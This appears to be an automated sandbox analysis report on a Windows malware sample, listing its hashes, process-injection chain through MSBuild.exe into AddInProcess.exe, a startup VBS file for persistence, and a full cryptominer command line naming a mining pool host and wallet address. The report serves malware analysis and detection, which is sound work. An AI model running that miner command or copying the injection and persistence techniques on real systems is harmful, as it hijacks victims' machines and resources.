Analysis
-
max time kernel
148s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 20:02
Static task
static1
Behavioral task
behavioral1
Sample
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe
Resource
win10v2004-20241007-en
General
-
Target
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe
-
Size
1.6MB
-
MD5
dce4e27a9b406b7ab027bf9120cbd586
-
SHA1
ae49c0d0e091519fe7dbb48c7300a823aa8bcf2d
-
SHA256
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e
-
SHA512
4686553a9d596658db4feb55f55fb86315aa7eec4de2bb4dfdfd733268c9b03b311b0807e4c807866167c0a34a2dc26b090536bbdf920074c3fe32a1d52aa5aa
-
SSDEEP
24576:9sRgQPPLVkiouiRjaMkVRu9JS70cJscGh6U8mEGKacNpVAADNi5GeZTOjoR:9sV3LGjpkVIJunw98mTKfVAyNioSTOm
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exeInnerException.exeMSBuild.exedescription pid process target process PID 4552 created 3520 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe Explorer.EXE PID 4012 created 3520 4012 InnerException.exe Explorer.EXE PID 3256 created 3520 3256 MSBuild.exe Explorer.EXE -
Drops startup file 1 IoCs
Processes:
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FailedAssemblyInfo.vbs 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe -
Executes dropped EXE 2 IoCs
Processes:
InnerException.exeInnerException.exepid process 4012 InnerException.exe 3476 InnerException.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exeInnerException.exeInnerException.exeMSBuild.exeMSBuild.exedescription pid process target process PID 4552 set thread context of 1248 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe PID 4012 set thread context of 3476 4012 InnerException.exe InnerException.exe PID 3476 set thread context of 3256 3476 InnerException.exe MSBuild.exe PID 3256 set thread context of 2748 3256 MSBuild.exe MSBuild.exe PID 2748 set thread context of 1684 2748 MSBuild.exe AddInProcess.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exeInnerException.exeMSBuild.exeMSBuild.exepid process 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe 4012 InnerException.exe 3256 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe 2748 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exeInnerException.exeInnerException.exeMSBuild.exeMSBuild.exeAddInProcess.exedescription pid process Token: SeDebugPrivilege 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe Token: SeDebugPrivilege 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe Token: SeDebugPrivilege 1248 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe Token: SeDebugPrivilege 4012 InnerException.exe Token: SeDebugPrivilege 4012 InnerException.exe Token: SeDebugPrivilege 3476 InnerException.exe Token: SeDebugPrivilege 3256 MSBuild.exe Token: SeDebugPrivilege 3256 MSBuild.exe Token: SeDebugPrivilege 2748 MSBuild.exe Token: SeLockMemoryPrivilege 1684 AddInProcess.exe Token: SeLockMemoryPrivilege 1684 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AddInProcess.exepid process 1684 AddInProcess.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exeInnerException.exeInnerException.exeMSBuild.exeMSBuild.exedescription pid process target process PID 4552 wrote to memory of 1248 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe PID 4552 wrote to memory of 1248 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe PID 4552 wrote to memory of 1248 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe PID 4552 wrote to memory of 1248 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe PID 4552 wrote to memory of 1248 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe PID 4552 wrote to memory of 1248 4552 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe 5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe PID 4012 wrote to memory of 3476 4012 InnerException.exe InnerException.exe PID 4012 wrote to memory of 3476 4012 InnerException.exe InnerException.exe PID 4012 wrote to memory of 3476 4012 InnerException.exe InnerException.exe PID 4012 wrote to memory of 3476 4012 InnerException.exe InnerException.exe PID 4012 wrote to memory of 3476 4012 InnerException.exe InnerException.exe PID 4012 wrote to memory of 3476 4012 InnerException.exe InnerException.exe PID 3476 wrote to memory of 3256 3476 InnerException.exe MSBuild.exe PID 3476 wrote to memory of 3256 3476 InnerException.exe MSBuild.exe PID 3476 wrote to memory of 3256 3476 InnerException.exe MSBuild.exe PID 3476 wrote to memory of 3256 3476 InnerException.exe MSBuild.exe PID 3476 wrote to memory of 3256 3476 InnerException.exe MSBuild.exe PID 3476 wrote to memory of 3256 3476 InnerException.exe MSBuild.exe PID 3256 wrote to memory of 2748 3256 MSBuild.exe MSBuild.exe PID 3256 wrote to memory of 2748 3256 MSBuild.exe MSBuild.exe PID 3256 wrote to memory of 2748 3256 MSBuild.exe MSBuild.exe PID 3256 wrote to memory of 2748 3256 MSBuild.exe MSBuild.exe PID 3256 wrote to memory of 2748 3256 MSBuild.exe MSBuild.exe PID 3256 wrote to memory of 2748 3256 MSBuild.exe MSBuild.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe PID 2748 wrote to memory of 1684 2748 MSBuild.exe AddInProcess.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe"C:\Users\Admin\AppData\Local\Temp\5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4552
-
-
C:\Users\Admin\AppData\Local\Temp\5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe"C:\Users\Admin\AppData\Local\Temp\5b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Users\Admin\AppData\Roaming\Access\InnerException.exe"C:\Users\Admin\AppData\Roaming\Access\InnerException.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3256
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1684
-
-
-
C:\Users\Admin\AppData\Roaming\Access\InnerException.exeC:\Users\Admin\AppData\Roaming\Access\InnerException.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4012
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD5dce4e27a9b406b7ab027bf9120cbd586
SHA1ae49c0d0e091519fe7dbb48c7300a823aa8bcf2d
SHA2565b219722844718194c11874136d8b7b85ea25cda551d7002850cb930b9fc0b3e
SHA5124686553a9d596658db4feb55f55fb86315aa7eec4de2bb4dfdfd733268c9b03b311b0807e4c807866167c0a34a2dc26b090536bbdf920074c3fe32a1d52aa5aa